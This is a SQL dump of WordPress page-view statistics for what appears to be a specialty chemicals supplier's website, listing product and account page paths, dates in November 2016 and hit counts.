INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds', '2016-11-02', 2, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-11-02', 2, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-11-02', 4, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-11-02', 2, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-11-02', 5, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-11-02', 4, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-11-02', 5, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals', '2016-11-02', 1, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/', '2016-11-02', 3, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722', '2016-11-02', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-11-02', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l-flux-remover/', '2016-11-02', 2, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca', '2016-11-02', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-11-02', 2, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-smt', '2016-11-02', 1, 2226); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-smt/', '2016-11-02', 1, 2226); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf', '2016-11-02', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-11-02', 2, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-11-02', 12, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl/', '2016-11-02', 2, 1679); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-11-02', 4, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-ultra/', '2016-11-02', 1, 2788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-11-02', 5, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-11-02', 3, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-11-02', 1, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/', '2016-11-02', 5, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-11-02', 7, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-11-02', 3, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-11-02', 26, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/ms-907/', '2016-11-02', 1, 1150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/ms-907/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-11-02', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-11-02', 6, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-02', 2, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-11-02', 2, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-02', 3, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-11-02', 8, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-11-02', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-11-02', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-11-02', 2, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/?wc-ajax=get_refreshed_fragments', '2016-11-02', 2, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-11-02', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/', '2016-11-02', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-sg/', '2016-11-02', 1, 1431); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-sg/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1431); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-505/heloxy-505/', '2016-11-02', 1, 1272); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-11-02', 5, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-11-02', 2, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-02', 2, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-11-02', 13, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-11-02', 5, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/', '2016-11-02', 1, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-11-02', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-11-02', 9, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-11-02', 12, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/?wc-ajax=get_refreshed_fragments', '2016-11-02', 2, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-226-fg/', '2016-11-02', 1, 2741); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-11-02', 6, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/', '2016-11-02', 1, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-11-02', 4, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-11-02', 2, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-11-02', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-11-02', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-765767/', '2016-11-02', 1, 1710); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-765767/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1710); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-mold-release-issues/', '2016-11-02', 1, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-11-02', 4, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-11-02', 2, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-11-02', 10, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-11-02', 4, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-11-02', 1, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mold-release-agent/', '2016-11-02', 1, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agents/', '2016-11-02', 1, 297); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/', '2016-11-02', 2, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agents/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 297); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-11-02', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-11-02', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-11-02', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-11-02', 2, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/?wc-ajax=get_refreshed_fragments', '2016-11-02', 2, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/', '2016-11-02', 2, 1834); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1834); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/ms-752u-ultrapure/', '2016-11-02', 1, 1841); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-11-02', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-11-02', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/', '2016-11-02', 1, 1230); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1230); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-11-02', 1, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/', '2016-11-02', 1, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-11-02', 4, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-11-02', 8, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-11-02', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-11-02', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-11-02', 7, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-11-02', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-11-02', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-11-02', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/', '2016-11-02', 1, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-11-02', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-11-02', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/', '2016-11-02', 1, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-11-02', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-11-02', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-11-02', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-11-02', 2, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/', '2016-11-02', 1, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-11-02', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-coating/', '2016-11-02', 1, 734); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-coating/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 734); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-11-02', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-11-02', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-164/', '2016-11-02', 1, 955); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-164/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 955); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/', '2016-11-02', 1, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-11-02', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/', '2016-11-02', 1, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-11-02', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-11-02', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a7/', '2016-11-02', 1, 1016); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-211/', '2016-11-02', 1, 818); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/', '2016-11-02', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-11-02', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-11-02', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-11-02', 2, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-handpiece-lubricants/', '2016-11-02', 2, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-11-02', 3, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?add_to_wishlist=1705', '2016-11-02', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-11-02', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/', '2016-11-02', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-11-03', 204, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-11-03', 68, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-11-03', 41, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-11-03', 3, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-11-03', 44, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-11-03', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-11-03', 3, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-11-03', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-11-03', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-11-03', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-11-03', 5, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-11-03', 19, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-11-03', 4, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-11-03', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-11-03', 38, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-11-03', 7, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CMiOjtjojNACFYNGXgodJ6oB6Q', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CMiOjtjojNACFYNGXgodJ6oB6Q&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-11-03', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-11-03', 1, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CMvFlo7qjNACFQFofgodtgwPlA', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CMvFlo7qjNACFQFofgodtgwPlA&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CjwKEAjwwOvABRC08aedoZ_lnTMSJACs_cbuE4XQgPRRroCg7upF0NQ4Met41gkIzHkJWrwcpd8jeRoC-dnw_wcB', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CjwKEAjwwOvABRC08aedoZ_lnTMSJACs_cbuE4XQgPRRroCg7upF0NQ4Met41gkIzHkJWrwcpd8jeRoC-dnw_wcB&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-11-03', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-11-03', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-11-03', 6, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-11-03', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKD0nLD1jNACFc1ffgodkzINfQ', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKD0nLD1jNACFc1ffgodkzINfQ&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-11-03', 7, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-11-03', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CM6CzMb2jNACFVFlfgodvawDQw', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CM6CzMb2jNACFVFlfgodvawDQw&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLKU6_L2jNACFU1gfgodMMkAkQ', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLKU6_L2jNACFU1gfgodMMkAkQ&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-11-03', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/', '2016-11-03', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3270/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 1063); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CL2zxOr3jNACFYQkgQodsa4JRA', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-11-03', 13, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CL2zxOr3jNACFYQkgQodsa4JRA&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-11-03', 3, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-11-03', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-11-03', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-11-03', 3, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=COXj4caBjdACFQcIaQodmLUMtg', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=COXj4caBjdACFQcIaQodmLUMtg&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKPmrvuBjdACFckehgod0fcPcQ', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKPmrvuBjdACFckehgod0fcPcQ&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-11-03', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-11-03', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CNyQtNeCjdACFYEQgQodjw0Mzg', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CNyQtNeCjdACFYEQgQodjw0Mzg&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-11-03', 14, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-11-03', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-11-03', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-11-03', 1, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-11-03', 4, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CjwKEAjwwOvABRC08aedoZ_lnTMSJACs_cbuRagKQwdDUVeD4lKgB4ANX_1l_TuCHfq-kqTkjUILsxoCqzrw_wcB', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-11-03', 4, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-11-03', 5, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-11-03', 5, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-11-03', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-11-03', 2, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/millube-perfluorinated-synthetic-lubricants/', '2016-11-03', 1, 468); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milsolv-medical-solvents/', '2016-11-03', 1, 473); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-11-03', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-11-03', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-handpiece-lubricants/', '2016-11-03', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CIOP4aGMjdACFUovgQod2oUKCQ', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CIOP4aGMjdACFUovgQod2oUKCQ&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl/', '2016-11-03', 2, 1679); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-11-03', 3, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-11-03', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-11-03', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-11-03', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-11-03', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-11-03', 6, 2050); 
